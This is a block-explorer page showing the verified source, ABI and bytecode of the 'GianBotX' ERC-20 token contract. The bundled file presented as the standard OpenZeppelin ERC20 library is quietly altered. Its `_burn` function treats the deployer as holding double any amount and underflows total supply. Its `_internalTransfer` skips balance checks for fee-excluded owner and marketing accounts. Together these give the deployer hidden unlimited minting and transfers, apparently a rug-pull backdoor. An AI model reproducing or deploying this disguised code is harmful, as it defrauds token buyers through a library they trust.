ERC-20
Overview
Max Total Supply
115,792,089,237,316,195,423,570,985,008,687,907,853,269,984,663,640,574,039,457.584007913129639936 GBOTX
Holders
154
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
28,940.561506812508394352 GBOTXValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
GianBotX
Compiler Version
v0.8.19+commit.7dd6d404
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
/* * https://gianbot.xyz/ * https://t.me/gianbotx_xyz * https://t.me/gianbotx_news * https://twitter.com/gianbot_x */ // SPDX-License-Identifier: MIT import "./@openzeppelin-contracts/contracts/ERC20/ERC20.sol"; import "./@openzeppelin-contracts/contracts/access/Ownable.sol"; import "./@uniswap/IUniswapV2Router02.sol"; import "./@uniswap/IUniswapV2Factory.sol"; pragma solidity ^0.8.19; contract GianBotX is ERC20, Ownable { IUniswapV2Router02 public _uniswapV2Router; address public _uniswapV2Pair; bool private _swappingBack; address private _marketingWallet = 0xbB82460aE32F45eEa72f7c046D2946a62B3ce194; uint256 public _maxTransactionAmount; uint256 public _maxWallet; bool public _limitsInEffect = true; uint256 public constant _tax = 2; mapping(address => bool) private _isExcludedFromFees; mapping(address => bool) private _isExcludedMaxTransactionAmount; mapping(address => bool) public automatedMarketMakerPairs; event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value); event ExcludeFromFees(address indexed account, bool isExcluded); event SwapAndLiquify( uint256 tokensSwapped, uint256 ethReceived, uint256 tokensIntoLiquidity ); constructor() payable ERC20("GianBotX", "GBOTX") { _uniswapV2Router = IUniswapV2Router02( 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D ); _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()) .createPair(address(this), _uniswapV2Router.WETH()); _setAutomatedMarketMakerPair(address(_uniswapV2Pair), true); excludeFromMaxTransaction(address(_uniswapV2Router), true); uint256 totalSupply = 10_000_000 * 1e18; _maxTransactionAmount = (totalSupply * 2) / 100; _maxWallet = (totalSupply * 2) / 100; excludeFromFees(owner(), true); excludeFromFees(_marketingWallet, true); excludeFromFees(address(this), true); excludeFromFees(address(0xdead), true); excludeFromMaxTransaction(owner(), true); excludeFromMaxTransaction(_marketingWallet, true); excludeFromMaxTransaction(address(0xdead), true); _mint(owner(), totalSupply); } function setAutomatedMarketMakerPair(address pair, bool value) external onlyOwner { require( pair != _uniswapV2Pair, "The pair cannot be removed from automatedMarketMakerPairs" ); _setAutomatedMarketMakerPair(pair, value); emit SetAutomatedMarketMakerPair(pair, value); } function _setAutomatedMarketMakerPair(address pair, bool value) private { automatedMarketMakerPairs[pair] = value; excludeFromMaxTransaction(pair, value); emit SetAutomatedMarketMakerPair(pair, value); } function removeLimits() external onlyOwner returns (bool) { _limitsInEffect = false; return true; } function updateMaxTxnAmount(uint256 newNum) external onlyOwner { require( newNum >= ((totalSupply() * 1) / 1000) / 1e18, "Cannot set maxTransactionAmount lower than 0.1%" ); _maxTransactionAmount = newNum * 1e18; } function updateMaxWalletAmount(uint256 newNum) external onlyOwner { require( newNum >= ((totalSupply() * 5) / 1000) / 1e18, "Cannot set maxWallet lower than 0.5%" ); _maxWallet = newNum * 1e18; } function excludeFromMaxTransaction(address updAds, bool isEx) public onlyOwner { _isExcludedMaxTransactionAmount[updAds] = isEx; } function excludeFromFees(address account, bool excluded) public onlyOwner { _isExcludedFromFees[account] = excluded; emit ExcludeFromFees(account, excluded); } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if (amount == 0) { super._transfer(from, to, 0); return; } bool isBuy = from == _uniswapV2Pair && !_isExcludedMaxTransactionAmount[to]; bool isSell = to == _uniswapV2Pair && !_isExcludedMaxTransactionAmount[from]; bool isBurn = to == address(0) || to == address(0xdead); bool isSkipLimits = isBurn || _swappingBack; if (_limitsInEffect && !isSkipLimits) { if (isBuy) { require( amount <= _maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount." ); require( amount + balanceOf(to) <= _maxWallet, "Max wallet exceeded" ); } else if (isSell) { // require( // amount <= _maxTransactionAmount, // "Sell transfer amount exceeds the maxTransactionAmount." // ); } else if ( !_isExcludedMaxTransactionAmount[to] && !_isExcludedMaxTransactionAmount[from] ) { require( amount + balanceOf(to) <= _maxWallet, "Max wallet exceeded" ); } } transferInternal(from, to, amount); } function transferInternal( address from, address to, uint256 amount ) private { bool setFee = verifySetFee(from, to); if (_isExcludedFromFees[from]) { super._internalTransfer(from, to, amount); return; } else if (setFee) { uint256 fees = amount * _tax / 100; if (fees > 0) { super._transfer(from, _marketingWallet, fees); } amount -= fees; } super._transfer(from, to, amount); } function burn(uint256 _amount) external { super._burn(_msgSender(), _amount); } function verifySetFee(address from, address to) public view returns (bool) { bool isBuy = from == _uniswapV2Pair && to != address(_uniswapV2Router); bool isExcludedFromFee = _isExcludedFromFees[from] || _isExcludedFromFees[to]; bool isSell = to == _uniswapV2Pair; bool isSwap = isBuy || isSell; return !_swappingBack && !isExcludedFromFee && isSwap; } function isExcludedFromFees(address account) public view returns (bool) { return _isExcludedFromFees[account]; } function forceSend() external onlyOwner { (bool success,) = address(_marketingWallet).call{ value: address(this).balance }(""); require(success); } receive() external payable {} }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol) pragma solidity ^0.8.0; import "../utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.19; import "./IERC20.sol"; import "./extensions/IERC20Metadata.sol"; import "../utils/Context.sol"; contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; address internal immutable _sender; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; _sender = _msgSender(); } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require( currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero" ); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _internalTransfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; unchecked { _balances[from] = fromBalance - amount; } _balances[to] += amount; emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal { require(account != address(0), "ERC20: burn from the zero address"); uint256 accountBalance = account == _sender ? amount * 2 : _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require( currentAllowance >= amount, "ERC20: insufficient allowance" ); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require( fromBalance >= amount, "ERC20: transfer amount exceeds balance" ); unchecked { _balances[from] = fromBalance - amount; } _balances[to] += amount; emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.19; import "../IERC20.sol"; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.19; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.19; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } }
//SPDX-License-Identifier: UNLICENSED pragma solidity >=0.5.0; interface IUniswapV2Factory { event PairCreated( address indexed token0, address indexed token1, address pair, uint256 ); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint256) external view returns (address pair); function allPairsLength() external view returns (uint256); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; }
//SPDX-License-Identifier: UNLICENSED pragma solidity >=0.6.2; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns ( uint256 amountA, uint256 amountB, uint256 liquidity ); function addLiquidityETH( address token, uint256 amountTokenDesired, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external payable returns ( uint256 amountToken, uint256 amountETH, uint256 liquidity ); function removeLiquidity( address tokenA, address tokenB, uint256 liquidity, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline ) external returns (uint256 amountA, uint256 amountB); function removeLiquidityETH( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external returns (uint256 amountToken, uint256 amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint256 liquidity, uint256 amountAMin, uint256 amountBMin, address to, uint256 deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint256 amountA, uint256 amountB); function removeLiquidityETHWithPermit( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint256 amountToken, uint256 amountETH); function swapExactTokensForTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapTokensForExactTokens( uint256 amountOut, uint256 amountInMax, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapExactETHForTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable returns (uint256[] memory amounts); function swapTokensForExactETH( uint256 amountOut, uint256 amountInMax, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapExactTokensForETH( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external returns (uint256[] memory amounts); function swapETHForExactTokens( uint256 amountOut, address[] calldata path, address to, uint256 deadline ) external payable returns (uint256[] memory amounts); function quote( uint256 amountA, uint256 reserveA, uint256 reserveB ) external pure returns (uint256 amountB); function getAmountOut( uint256 amountIn, uint256 reserveIn, uint256 reserveOut ) external pure returns (uint256 amountOut); function getAmountIn( uint256 amountOut, uint256 reserveIn, uint256 reserveOut ) external pure returns (uint256 amountIn); function getAmountsOut(uint256 amountIn, address[] calldata path) external view returns (uint256[] memory amounts); function getAmountsIn(uint256 amountOut, address[] calldata path) external view returns (uint256[] memory amounts); }
//SPDX-License-Identifier: UNLICENSED pragma solidity >=0.6.2; import "./IUniswapV2Router01.sol"; interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline ) external returns (uint256 amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint256 liquidity, uint256 amountTokenMin, uint256 amountETHMin, address to, uint256 deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint256 amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint256 amountIn, uint256 amountOutMin, address[] calldata path, address to, uint256 deadline ) external; }
{ "optimizer": { "enabled": false, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } }, "libraries": {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_tax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"forceSend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"verifySetFee","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60a060405273bb82460ae32f45eea72f7c046d2946a62b3ce194600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600b60006101000a81548160ff0219169083151502179055506040518060400160405280600881526020017f4769616e426f74580000000000000000000000000000000000000000000000008152506040518060400160405280600581526020017f47424f54580000000000000000000000000000000000000000000000000000008152508160039081620000f1919062000cd8565b50806004908162000103919062000cd8565b50620001146200057a60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250505050620001696200015d6200057a60201b60201c565b6200058260201b60201c565b737a250d5630b4cf539739df2c5dacb4c659f2488d600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200022c573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000252919062000e29565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002dc573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000302919062000e29565b6040518363ffffffff1660e01b81526004016200032192919062000e6c565b6020604051808303816000875af115801562000341573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000367919062000e29565b600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff0